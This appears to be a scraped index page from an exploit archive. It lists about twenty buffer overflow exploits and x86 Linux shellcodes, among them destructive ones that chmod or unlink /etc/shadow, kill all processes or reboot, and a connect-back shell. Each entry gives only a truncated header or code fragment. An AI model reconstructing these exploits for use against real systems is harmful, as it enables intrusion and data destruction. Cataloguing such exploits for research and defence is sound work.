Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH)

No description provided by source. !usr/bin/python Exploit Title: Exploit Buffer Overflow MP3-Nator Date: 10\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/d.php?softid=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3audio%2Fplayers%2Fmp3nator.zip Version: 2.0 Tested on:...

ZipScan 2.2c SEH

No description provided by source. !/usr/bin/perl Software : ZipScan 2.2c .zip Bug found by : Lincoln Author : Lincoln & corelanc0d3r OS : Windows Tested on : XP SP3 En VirtualBox Type of vuln : SEH Greetz to : Corelan Security Team...

Xsok 1.02 - "-xsokdir" Local Buffer Overflow Game Exploit

No description provided by source. / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded by c0wboy c 0x333 Outsiders Security Labs / www.0x333.org / include stdio.h include unistd.h define BIN /usr/games/xsok define RETADD 0xbffffa3c define SIZE 200 unsigned char shellcode = /...

change mode 0777 of "/etc/shadow" with sys_chmod syscall

No description provided by source. / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

LCDProc 0.4 - Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1131/info A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As liste...

Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF

No description provided by source. pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------- bZenturi NixonMyPrograms Class sasatl.dll v. 1.5.0.531 Scan Method Remote Buffer Overflow Exploit Heap Spray...

kill all running process x86/linux

No description provided by source. / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)

No description provided by source. !/usr/bin/python import socket,sys Tested on XP Pro SP2 Eng and XP Pro SP3 Eng print Easy FTP Server v1.7.0.11 MKD Remote BoF Exploit Post Authentication Author / Discovered by : Karn Ganeshen Date : July 5, 2010 KarnGaneshen aT gmail d0t com...

Easy File Sharing Web Server 6.8 - Stack Buffer Overflow

No description provided by source. Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow Date: 10 May 2014 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://www.efssoft.com Software Link: http://www.sharing-file.com/efssetup.exe Version: 6.8 Tested...

Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)

No description provided by source. !/usr/bin/perl Exploit Title: Photodex ProShow Producer v5.0.3310 - Local Buffer Overflow SEH Date: 10-26-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software: Photodex ProShow Producer v5.0.3310 Software Link:...

lftp <= 2.6.9 - Remote Stack based Overflow Exploit

No description provided by source. / lftp remote stack-based overflow exploit by Li0n7 voila fr Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based overflow in trynetscapeproxy and trysquideplf...

Oracle 8.x cmctl Buffer Overflow Vulnerability

No description provided by source. / source: http://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied command...

45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode

No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)

No description provided by source. !/usr/bin/python BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow 0day Matteo Memelli aka ryujin www.be4mind.com - www.gray-world.net 04/13/2008 Tested on Windows 2000 Sp4 English Vulnerable process is AntServer.exe Offset for SEH overwrite is 954 Bytes...

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a...

39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode

No description provided by source. / Name : 39 bytes syssetuid0 & syssetgid0 & execve /bin/sh x86 linux shellcode Date : Tue Jun 1 21:29:10 2010 Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian / includ...

33 bytes unlink "/etc/shadow" x86 linux shellcode

No description provided by source. / Name : 33 bytes unlink /etc/shadow x86 linux shellcode Date : Wed Jun 2 18:01:44 2010 Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian / include stdio.h char...

mIRC 6.1 "IRC" Protocol Remote Buffer Overflow Exploit

No description provided by source. / remote mirc 6.11 exploit by blasty TESTED ON: Windows XP No SP, Ducth Build: 2600.xpclient.010817-1148 A few days ago, I saw a mIRC advisory on packetstorm 1 and was surprised nobody had written an exploit yet. So I decided to start writing one. Since this was...

Linux/x86-32 - ConnectBack with SSL connection - 422 bytes

No description provided by source. / Title: Linux/x86-32 - ConnectBack with SSL connection - 422 bytes Date: 2011-06-08 Tested on: ArchLinux i686 Author: Jonathan Salwan - twitter: @jonathansalwan http://shell-storm.org Configurations server...

MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)

No description provided by source. Exploit Title : MoreAmp .maf local Stack Buffer Overflow SEH tested on windows xp SP 3 FR Author: MadjiX Special Greets:His0k4 where are you : Greets:Bibi-info , Silectovic , Volc4n0 my $file= MadjiX.maf; my $junk = \x41 x 108 ; my $nseh = \xeb\x06\x90\x90 ; my...